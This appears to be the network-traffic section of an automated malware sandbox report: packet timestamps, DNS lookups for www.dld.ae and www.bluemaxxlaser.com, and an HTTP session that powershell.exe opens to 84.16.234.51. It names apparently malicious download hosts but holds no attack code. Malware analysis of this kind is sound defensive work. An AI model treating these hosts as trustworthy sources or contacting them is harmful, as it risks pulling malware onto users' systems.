                                                        Jun 1, 2023 12:14:18.631963968 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.631985903 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632010937 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632016897 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632035971 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632059097 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632061958 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632087946 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632113934 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632116079 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632139921 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632164001 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632168055 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632194042 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632214069 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632220030 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632246971 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632277012 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632534981 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632564068 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632590055 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632600069 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632616997 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632636070 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632642984 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632668972 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632688046 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632694960 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632723093 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632747889 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632751942 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632774115 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632796049 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632802010 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632828951 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632850885 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632853985 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632884026 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632900953 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632910013 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632936954 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632937908 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632951021 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632966042 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.632985115 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.632992983 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633009911 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633019924 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633040905 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633047104 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633066893 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633074045 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633096933 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633101940 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633130074 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633135080 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633147001 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633155107 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633181095 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633182049 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633209944 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633217096 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633249998 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633280993 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633306980 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633332968 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633260965 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633354902 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633354902 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633356094 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633356094 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633358002 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633382082 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633395910 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633414984 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633420944 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633441925 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633449078 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633465052 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633476019 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633496046 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633512020 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633522034 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633541107 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633557081 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633567095 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.633584976 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.633618116 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801304102 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801374912 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801424980 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801454067 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801474094 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801525116 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801551104 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801551104 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801551104 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801582098 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801631927 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801687956 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801687956 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801687956 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801697969 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801745892 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801795006 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801841974 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801856995 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801856995 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801856995 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801903963 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801954031 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.801978111 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.801978111 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802001953 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802048922 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802095890 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802103996 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802103996 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802103996 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802143097 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802191019 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802239895 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802249908 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802249908 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802249908 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802292109 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802339077 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802386045 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802401066 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802401066 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802401066 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802436113 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802483082 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802530050 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802542925 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802542925 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802544117 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802580118 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802628040 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802674055 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802695036 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802695036 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802695036 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802721977 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802788019 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802814007 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802850962 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802860022 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802907944 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.802911997 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802911997 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.802957058 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803004026 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803004980 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803024054 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803055048 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803081036 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803102016 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803150892 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803152084 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803152084 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803200006 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803235054 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803252935 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803277016 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803303003 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803349972 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803355932 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803355932 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803396940 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803445101 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803492069 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803505898 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803505898 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803505898 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803539038 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803586960 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803632975 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803653955 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803653955 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803653955 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803680897 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803728104 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803775072 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803786993 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803786993 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803786993 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803823948 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803872108 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803920031 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.803958893 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803958893 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803958893 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.803970098 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804018974 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804068089 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804090977 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804091930 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804091930 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804115057 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804162025 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804209948 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804236889 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804236889 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804236889 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804256916 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804308891 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804337978 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804389000 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804435968 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804445982 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804445982 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804446936 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804485083 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804533958 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804579973 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804609060 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804609060 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804610014 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804626942 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804682970 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804702044 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804711103 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804759979 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804807901 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804814100 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804815054 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804857016 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804903984 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804905891 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.804904938 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.804955959 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805002928 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805028915 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805028915 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805049896 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805099010 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805145025 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805166006 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805166006 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805166006 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805192947 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805238962 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805301905 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805311918 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805311918 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805311918 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805360079 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805388927 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805409908 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805457115 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805459976 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805504084 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805565119 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805567980 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805567980 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805567980 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805586100 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805634022 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805680037 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805682898 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805682898 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805708885 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805718899 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805768013 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.805768967 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805913925 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.805913925 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:18.976696014 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:18.977299929 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.145438910 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.145694017 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.313534021 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.313672066 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.481473923 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.481725931 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.649483919 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.649570942 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.817424059 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.817533970 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:19.985233068 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:19.985356092 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.153143883 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.153243065 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.320995092 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.321249008 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.489044905 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.489234924 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.656996965 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.657098055 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.824940920 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.827728987 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:20.995599985 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:20.999650955 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:21.167474031 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:21.167825937 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:21.336374044 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:21.336570024 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:21.504337072 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:21.504497051 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:21.672204018 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:21.672352076 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:21.840178013 CEST8049698203.175.174.69192.168.2.3
                                                        Jun 1, 2023 12:14:21.840418100 CEST4969880192.168.2.3203.175.174.69
                                                        Jun 1, 2023 12:14:22.222845078 CEST4969880192.168.2.3203.175.174.69

                                                        UDP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jun 1, 2023 12:14:13.757148981 CEST5238753192.168.2.38.8.8.8
                                                        Jun 1, 2023 12:14:13.813536882 CEST53523878.8.8.8192.168.2.3
                                                        Jun 1, 2023 12:14:13.820131063 CEST5692453192.168.2.38.8.8.8
                                                        Jun 1, 2023 12:14:13.964695930 CEST53569248.8.8.8192.168.2.3
                                                        Jun 1, 2023 12:14:17.069339991 CEST6062553192.168.2.38.8.8.8
                                                        Jun 1, 2023 12:14:17.097599983 CEST53606258.8.8.8192.168.2.3

                                                        DNS Queries

                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                        Jun 1, 2023 12:14:13.757148981 CEST192.168.2.38.8.8.80x3e78Standard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                        Jun 1, 2023 12:14:13.820131063 CEST192.168.2.38.8.8.80x4427Standard query (0)www.dld.aeA (IP address)IN (0x0001)false
                                                        Jun 1, 2023 12:14:17.069339991 CEST192.168.2.38.8.8.80x46caStandard query (0)www.bluemaxxlaser.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Jun 1, 2023 12:14:13.813536882 CEST8.8.8.8192.168.2.30x3e78No error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                        Jun 1, 2023 12:14:13.813536882 CEST8.8.8.8192.168.2.30x3e78No error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                        Jun 1, 2023 12:14:13.964695930 CEST8.8.8.8192.168.2.30x4427No error (0)www.dld.aedld.aeCNAME (Canonical name)IN (0x0001)false
                                                        Jun 1, 2023 12:14:13.964695930 CEST8.8.8.8192.168.2.30x4427No error (0)dld.ae84.16.234.51A (IP address)IN (0x0001)false
                                                        Jun 1, 2023 12:14:17.097599983 CEST8.8.8.8192.168.2.30x46caNo error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • www.dld.ae
                                                        • www.bluemaxxlaser.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.34969784.16.234.51443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
